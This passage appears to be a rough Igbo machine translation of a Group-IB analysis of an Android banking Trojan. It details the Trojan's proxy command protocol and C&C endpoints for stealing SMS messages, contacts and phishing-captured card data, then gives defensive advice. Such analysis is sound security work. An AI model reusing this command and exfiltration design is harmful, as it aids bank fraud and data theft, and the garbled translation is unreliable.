- netwọkụdị - ụdị njikọ netwọkụ dị ugbu a (atụ: "WIFI", "MOBILE"). Ọ bụrụ na ezighi ezi, ọ ga-alaghachi efu.
- hasGsmSupport – eziokwu – ọ bụrụ na ekwentị na-akwado GSM, ma ọ bụghị ụgha.
- simReady – steeti kaadị SIM.
- SIMCountry - Koodu obodo ISO (dabere na ndị na-eweta kaadị SIM).
- onye ọrụ netwọk - aha onye ọrụ. Ọ bụrụ na njehie mere n'oge usoro ịnweta uru, a ga-ede ozi ederede njehie kama mpaghara a.
- simOperator - Aha Onye na-enye ọrụ (SPN). Ọ bụrụ na njehie mere n'oge usoro ịnweta uru, a ga-ede ozi ederede njehie kama mpaghara a.
- ụdị - A na-echekwa mpaghara a na klaasị nhazi; maka ụdị bot a nwalere, ọ ruru "1.6".
5. Gbanwee n'ụdị ichere iwu sitere na sava ahụ. Iwu sitere na ihe nkesa na-abịa n'ụdị:
- 0 akwụ ụgwọ - iwu
- 1 offset – sessionId
- 2 akwụ ụgwọ - ogologo
- 4 degharịa - data
Mgbe iwu rutere, ngwa a na-edekọ:
mainLog(" nkụnye eji isi mee { sessionId], ụdị[], ogologo[] }")
Iwu ndị a sitere na ihe nkesa ga-ekwe omume:
| aha | iwu | data | Description |
|---|---|---|---|
| njikọId | 0 | NJ njikọ | Mepụta njikọ ọhụrụ |
| SLEEP | 3 | Time | kwụsịtụ modul proxy |
| PING_PONG | 4 | - | Zipu ozi PONG |
Ozi PONG nwere bytes anọ ma yie nke a: 0X04000000.
Mgbe enwetara iwu connectionId (iji mepụta njikọ ọhụrụ) Njikọ Command na-emepụta ihe atụ nke otu klas ProxyConnection.
- Klas abụọ na-ekere òkè na proxying: ProxyConnection и njedebe. Mgbe ị na-eke klas ProxyConnection jikọọ na adreesị ProxyConfigClass.host: ProxyConfigClass.proxyPort na ịgafe ihe JSON:
{
"id":<%connectionId%>
}Na nzaghachi, ihe nkesa na-eziga ozi SOCKS5 nwere adreesị nke ihe nkesa dịpụrụ adịpụ nke a ga-eji nweta njikọ ahụ. Mmekọrịta na ihe nkesa a na-eme site na klaasị njedebe. Enwere ike ịnọchite anya n'usoro nhazi njikọ dị ka ndị a:
Mmekọrịta netwọkụ
Iji gbochie nyocha okporo ụzọ site na sniffers netwọk, mmekọrịta dị n'etiti ihe nkesa CnC na ngwa nwere ike ichekwa site na iji SSL protocol. A na-ewepụta data niile ebutere site na ma na nkesa n'ụdị JSON. Ngwa a na-eme arịrịọ ndị a mgbe ọ na-arụ ọrụ:
- http://<%CnC%>/api/v1/set_state.php - nsonaazụ nke igbu egbu.
- http://<%CnC%>/api/v1/get.php - ịnata iwu.
- http://<%CnC%>/api/v1/load_sms.php - nbudata ozi SMS site na ngwaọrụ butere ọrịa.
- http://<%CnC%>/api/v1/load_ab.php - na-ebugote ndepụta kọntaktị site na ngwaọrụ butere ọrịa.
- http://<%CnC%>/api/v1/aevents.php - A na-arịọ arịrịọ mgbe ị na-emelite paramita dị na faịlụ mmasị.
- http://<%CnC%>/api/v1/set_card.php - na-ebugo data enwetara site na iji windo phishing na-eme ka Google Play Market.
- http://<%CnC%>/api/v1/logs.php - na-ebugote data ndekọ.
- http://<%CnC%>/api/v1/records.php - na-ebugote data enwetara site na windo phishing.
- http://<%CnC%>/api/v1/set_error.php – ngosi nke mperi mere.
na-atụ aro
Iji chebe ndị ahịa ha pụọ na iyi egwu nke Trojans mobile, ụlọ ọrụ ga-eji ngwọta zuru oke nke na-enye ha ohere nyochaa ma gbochie omume ọjọọ na-enweghị ịwụnye ngwanrọ ọzọ na ngwaọrụ ndị ọrụ.
Iji mee nke a, ụzọ mbinye aka maka ịchọpụta Trojans mkpanaka kwesịrị iji teknụzụ mee ka ike ya sie ike maka nyochaa omume nke ma onye ahịa yana ngwa n'onwe ya. Nchedo ahụ kwesịkwara ịgụnye ọrụ njirimara ngwaọrụ site na iji teknụzụ mkpịsị aka dijitalụ, nke ga-eme ka o kwe omume ịghọta mgbe a na-eji akaụntụ site na ngwaọrụ na-adịghị ahụ anya ma dabaworị n'aka onye wayo.
Isi ihe dị mkpa dị mkpa bụ nnweta nyocha nke ọwa, nke na-enye ohere ka ụlọ ọrụ chịkwaa ihe egwu na-ebilite ọ bụghị naanị na ịntanetị, kamakwa na ọwa mkpanaka, dịka ọmụmaatụ, na ngwa maka ụlọ akụ ekwentị, maka azụmahịa na cryptocurrencies na ndị ọzọ ebe. enwere ike ịme azụmahịa.
Iwu nchekwa maka ndị ọrụ:
- etinyela ngwa maka ekwentị mkpanaaka nwere Android OS site na isi mmalite ọ bụla na-abụghị Google Play, tinye uche pụrụ iche na ikike nke ngwa ahụ rịọrọ;
- wụnye mmelite Android OS mgbe niile;
- ṅaa ntị na ndọtị nke faịlụ ebudatara;
- eletala akụrụngwa enyo;
- Apịla njikọ enwetara na ozi SMS.
Na-egosi Semyon Rogacheva, Ọkachamara dị obere na nyocha malware na Group-IB Kọmputa Forensics Laboratory.
isi: www.habr.com